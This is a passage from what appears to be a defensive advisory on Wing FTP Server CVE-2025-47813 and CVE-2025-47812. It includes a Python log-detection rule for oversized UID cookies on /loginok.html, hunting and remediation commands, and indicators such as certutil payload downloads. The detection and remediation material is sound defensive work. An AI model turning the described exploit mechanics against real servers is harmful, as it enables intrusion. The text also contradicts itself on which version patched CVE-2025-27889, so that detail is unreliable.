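    for name, size, reasons in hunt_session_dir(build_demo_dir()):
        print(f"{size:6d} {name[:12]}... {'; '.join(reasons) or 'ok'}")
```

Point hunt_session_dir at the real session directory on a host under investigation; anything flagged should be pulled for manual review rather than deleted in place.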

A question defenders frequently ask is whether the exploit attempt itself is detectable before damage is done. The answer is yes, with the right logging in place. CVE-2025-47813 requires a request to /loginok.html with a UID cookie value that exceeds the operating system's maximum path length — typically 260 characters on Windows (MAX_PATH) and 4,096 on Linux. An HTTP access log or WAF rule capturing the full cookie header will show a request with a UID value far longer than any legitimate session identifier. Wing FTP's own HTTP logging, if enabled at the verbose level, will record the error that fires in response. Organizations with SIEM coverage of their Wing FTP hosts should write a detection rule for: HTTP requests to /loginok.html where the UID cookie length exceeds 300 characters. A single match is a probable exploitation attempt. Multiple matches in a short window from the same source IP indicate automated scanning. Neither is a false positive scenario in a correctly configured environment — legitimate Wing FTP session cookies do not approach that length.
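The detection rule just described, as an added example that is not code from the original article and does not use Wing FTP's real log format: it parses a constructed access-log layout, measures the UID cookie value, and alerts on /loginok.html requests where that length exceeds 300, then counts hits per source IP to separate a single attempt from automated scanning. The log line format and sample lines are assumptions built for this example.

```python
import re
from typing import Dict, List, Optional

# Threshold from the detection guidance; legitimate session cookies are far shorter.
UID_LENGTH_THRESHOLD = 300
TARGET_PATH = "/loginok.html"

# Assumed log layout (constructed for this example, not Wing FTP's real format):
# <client ip> [<timestamp>] "<method> <path> HTTP/1.1" <status> "<Cookie header>"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)


def uid_cookie_length(cookie_header: str) -> Optional[int]:
    """Length of the UID cookie value, or None if no UID cookie is present."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "UID":
            return len(value)
    return None


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line into a record with a numeric uid_len field."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["uid_len"] = uid_cookie_length(str(rec["cookie"]))
    return rec


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Return alerts: /loginok.html requests whose UID cookie is oversized."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these
        path = str(rec["path"]).split("?")[0]
        if path == TARGET_PATH and (rec["uid_len"] or 0) > UID_LENGTH_THRESHOLD:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "uid_len": rec["uid_len"]})
    return alerts


def summarize(alerts: List[Dict[str, object]]) -> Dict[str, int]:
    """Alerts per source IP; several from one address suggests automated scanning."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[str(a["ip"])] = counts.get(str(a["ip"]), 0) + 1
    return counts


# Constructed sample lines: one normal login, two oversized-cookie hits from
# the same address, and an oversized cookie on a non-target path (no alert).
SAMPLE_LOG = [
    '203.0.113.7 [16/Mar/2026:10:01:02 +0000] "POST /loginok.html HTTP/1.1" 200 "UID=' + "a" * 32 + '"',
    '198.51.100.9 [16/Mar/2026:10:05:11 +0000] "POST /loginok.html HTTP/1.1" 500 "UID=' + "A" * 420 + '"',
    '198.51.100.9 [16/Mar/2026:10:05:12 +0000] "POST /loginok.html HTTP/1.1" 500 "UID=' + "A" * 4200 + '; lang=en"',
    '198.51.100.9 [16/Mar/2026:10:05:13 +0000] "GET /index.html HTTP/1.1" 200 "UID=' + "A" * 420 + '"',
]
```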

For federal agencies, the March 30, 2026 deadline is mandatory under BOD 22-01. Failure to meet it is not a theoretical compliance risk — CISA's remediation tracking is active, and the KEV catalog is the operational instrument through which federal network security is enforced. Private sector organizations, while not bound by the directive, should treat the deadline with the same urgency: the threat actors exploiting this vulnerability do not limit their targeting to government infrastructure.

Patching to 7.4.4 closes CVE-2025-47813 and CVE-2025-47812, but it does not harden the deployment. Organizations that patch and then return to the same configuration that made the server exploitable in the first place are one future vulnerability away from the same problem. The configuration recommendations listed above — restricting web interface access to trusted IPs, disabling anonymous FTP, enabling verbose logging, running the service under a least-privilege account, segmenting the host at the network layer — remain valid as permanent hardening measures regardless of patch status.

Exposure self-assessment questions

Answer each question to estimate your risk posture.

  • Is your Wing FTP Server web interface exposed to the internet (not restricted to trusted IPs)?
  • Are you running Wing FTP Server version 7.4.3 or earlier (unpatched)?
  • Are anonymous FTP logins enabled on your Wing FTP Server instance?
  • Do you lack WAF rules inspecting UID cookie length on requests to the Wing FTP web interface?
  • Was your Wing FTP Server internet-accessible between July 2025 and today without having been investigated for compromise?

Key Takeaways

  1. Patch to Wing FTP Server 7.4.4 or later immediately. CVE-2025-47813 and CVE-2025-47812 are both patched in 7.4.4, released May 14, 2025. If your organization is still running 7.4.3 or earlier, you are exposed to a confirmed-exploited information disclosure flaw and a CVSS 10.0 remote code execution vulnerability with public PoC code available.
  2. CVSS score is not the whole story. CVE-2025-47813 earned a 4.3 — medium severity. It is on the CISA KEV catalog because it is being used in real attacks as a precursor to critical-severity exploitation. Patch management programs that filter only on high or critical severity will miss this class of threat.
  3. Chained vulnerabilities require chained remediation. Patching CVE-2025-47812 without patching CVE-2025-47813 leaves the reconnaissance capability in attacker hands. Both vulnerabilities share a patch: version 7.4.4. There is no reason to treat them as separate remediation tasks.
  4. File transfer servers demand elevated attention. Wing FTP, MOVEit, GoAnywhere, and similar platforms sit at the intersection of high-value data and network perimeter exposure. Attackers know this. Organizations running these platforms should apply patches faster than the standard patch cycle and maintain active monitoring of the processes and file directories associated with them.
  5. Hunt for post-exploitation indicators on unpatched systems. Any Wing FTP Server instance running 7.4.3 or earlier that was internet-accessible between July 2025 and the date of patching should be treated as a potential compromise and investigated using the indicators described above before being restored to normal operation.

The addition of CVE-2025-47813 to the KEV catalog nearly ten months after the patch was available is a reminder that vulnerability management is not a one-time event triggered by publication. It is an ongoing process that requires monitoring of both CVE disclosures and exploitation intelligence. CISA's catalog exists precisely to bridge that gap — translating exploitation evidence into mandatory action. Organizations that act on KEV additions promptly, rather than waiting for their own detection capabilities to surface a breach, are the ones that avoid becoming the next incident report.

How to Remediate CVE-2025-47813 and CVE-2025-47812

  1. Identify affected versions. Determine whether your Wing FTP Server installation is running version 7.4.3 or earlier. All versions at or below 7.4.3 are affected by both CVE-2025-47813 and CVE-2025-47812. Check the installed version via the Wing FTP admin panel or the vendor release history at wftpserver.com/serverhistory.htm.
  2. Upgrade to Wing FTP Server 7.4.4 or later. Version 7.4.4, released May 14, 2025, patches CVE-2025-47813, CVE-2025-47812, and CVE-2025-27889. Version 7.4.5 and all subsequent releases also contain the fix. This is the primary and preferred remediation action.
  3. Run the Wing FTP service under a dedicated least-privilege account. On Linux, create a locked wingftp system account with no shell and reassign ownership of the installation directory to it. Update the systemd unit with User=wingftp. On Windows, create a dedicated service account, assign "Log on as a service" rights, and remove it from all administrative groups. This mitigates CVE-2025-47811, which has no vendor patch.
  4. Apply interim mitigations if patching is not immediately possible. Restrict access to the Wing FTP web interface via network segmentation and firewall rules, limiting it to trusted IP ranges. Disable anonymous FTP logins. Implement WAF rules to detect and reject requests containing abnormally long UID cookie values. Enable detailed HTTP and session logging.
  5. Block outbound egress from the Wing FTP process. On Windows, add a Windows Defender Firewall outbound rule scoped to WFTPServer.exe that denies all outbound internet traffic. On Linux, use iptables -m owner --uid-owner wingftp rules to restrict outbound HTTP/HTTPS from the service account. This prevents payload download via certutil even if code execution succeeds.
  6. Disable the Wing FTP web console and task scheduler if not operationally required. These features allow arbitrary command execution at the service privilege level and are the mechanism CVE-2025-47811 describes. Restrict admin interface port 5466 to a specific management workstation or jump host.
  7. Deploy real-time file integrity monitoring on the session directory. On Linux, use auditctl -w /opt/wingftp/sessions/ -p wa -k wingftp_sessions. On Windows, enable Object Access auditing on the session folder and consume Event ID 4663 in your SIEM. Alert on any .lua file creation or any session file exceeding 500 bytes.
  8. Build a structured SIEM log pipeline for Wing FTP HTTP logs. Write a custom parser that extracts the UID cookie value length from Wing FTP HTTP access logs as a numeric field. Alert when that field exceeds 300 on a request to /loginok.html — this detects CVE-2025-47813 exploitation before the path is disclosed.
  9. Micro-segment the Wing FTP host at the network layer. Place the host in a dedicated VLAN with deny-by-default east-west rules. Allow only inbound FTP/SFTP/HTTPS from authorized client ranges, inbound admin access from a specific jump host, outbound to defined storage targets, and outbound to your SIEM. No general internet access from the host.
  10. Hunt for post-exploitation indicators on previously exposed systems. On any Wing FTP Server instance running 7.4.3 or earlier that was internet-accessible between July 2025 and the date of patching, enumerate all .lua session files, sort by size, and inspect any above 500 bytes. Look for anomalous outbound connections from WFTPServer.exe, certutil invocations, and unauthorized user accounts.
  11. Verify remediation and confirm patch status. After upgrading, confirm the installed version is 7.4.4 or later. Cross-reference the NVD entry for CVE-2025-47813 at nvd.nist.gov and check the CISA KEV catalog to confirm compliance. Federal agencies must complete remediation by March 30, 2026 under BOD 22-01.

Frequently Asked Questions

CVE-2025-47813 is an information disclosure vulnerability in Wing FTP Server's web interface. When an authenticated user sends a request with a UID cookie value longer than the operating system's maximum path length, the server generates a verbose error message that reveals the full local installation path. Despite a medium CVSS score of 4.3, CISA added it to the Known Exploited Vulnerabilities catalog on March 16, 2026, because it is being actively used in attacks as a reconnaissance step that makes the companion critical RCE vulnerability CVE-2025-47812 significantly easier to exploit.

All Wing FTP Server versions at or below 7.4.3 are affected by CVE-2025-47813. The vulnerability was patched in version 7.4.4, released May 14, 2025. Version 7.4.5 and all subsequent releases also contain the fix.

CVE-2025-47813 leaks the Wing FTP Server installation path. CVE-2025-47812 is a null byte and Lua code injection flaw that allows an attacker to write a malicious session file to disk and then execute it to achieve remote code execution. Knowing the precise installation path removes the guesswork from locating and targeting those session files — a step that is especially significant on Windows systems where installation paths vary between environments.

Federal Civilian Executive Branch agencies are required to remediate CVE-2025-47813 by March 30, 2026 under Binding Operational Directive 22-01. Private sector organizations are not bound by the directive but are strongly encouraged to treat the same date as an urgent remediation target given that active exploitation is confirmed.

Key indicators include unexpected .lua files in the Wing FTP Server session directory, anomalous outbound network connections from the WFTPServer.exe process, evidence of certutil being invoked from the Wing FTP server process (commonly used to download and execute external payloads), and new user accounts on the host that cannot be accounted for in normal operations.

The CISA KEV catalog tracks confirmed active exploitation, not theoretical severity. A vulnerability with a low or medium CVSS score can still appear on KEV if evidence shows it is being used in real attacks — particularly when it enables exploitation of a higher-severity companion vulnerability. CVE-2025-47813's CVSS score of 4.3 did not prevent its KEV listing because CISA's criterion is observed exploitation impact, not calculated score.

KEV listing requires confirmed in-the-wild exploitation as a documented, observed event — not theoretical exploitability or PoC availability. In July 2025, the exploitation evidence for CVE-2025-47812 was immediate and well-documented. CVE-2025-47813 was almost certainly being used in the same attack chains, but independent documentation of the path disclosure step as an actively exploited component took longer to accumulate. CISA's March 2026 listing reflects when the evidentiary threshold was reached, not when exploitation began. Defenders should treat July 2025 as the start of the active exploitation window for both CVEs.

Yes. The exploit requires a request to /loginok.html with a UID cookie value longer than the OS path length limit — typically 260 characters on Windows, 4,096 on Linux. A SIEM rule or WAF alert triggering on UID cookie values exceeding 300 characters on that endpoint will catch the attempt before the path is disclosed. Legitimate Wing FTP session cookies do not approach that length. Verbose HTTP logging on the Wing FTP host will also capture the error response that fires when the exploit lands. Either log source gives defenders a detection opportunity before the chain progresses to CVE-2025-47812.

Available incident data points to opportunistic, financially motivated attackers — including initial access brokers and ransomware affiliates. Huntress's July 2025 incident analysis described behavior consistent with automated tooling and certutil-based payload delivery, techniques common in crimeware operations. File transfer servers are a known ransomware staging ground following the 2023 Cl0p campaigns against MOVEit and GoAnywhere MFT. A compromised Wing FTP host gives an attacker SYSTEM-level access and internal network connectivity — a foothold valuable to ransomware operators, extortion groups, and anyone selling initial access. The investigation scope should not be limited to the Wing FTP host if compromise is confirmed.

CVE-2025-27889 is a link injection vulnerability at Wing FTP Server's /downloadpass.html endpoint, not an XSS flaw. The url parameter is not properly sanitized, allowing an attacker to inject an arbitrary destination link. If a user clicks the crafted link and submits the login form, their cleartext password is disclosed to the attacker. It carries a CVSS score of 3.4 and requires user interaction — it is not remotely exploitable without victim participation. Critically, CVE-2025-27889 was patched in version 7.4.3 (released March 30, 2025), not 7.4.4. Organizations running 7.4.3 are already protected against CVE-2025-27889 but remain fully exposed to CVE-2025-47812 and CVE-2025-47813 until they upgrade to 7.4.4. The correct minimum version for full coverage of all actively exploited flaws is 7.4.4.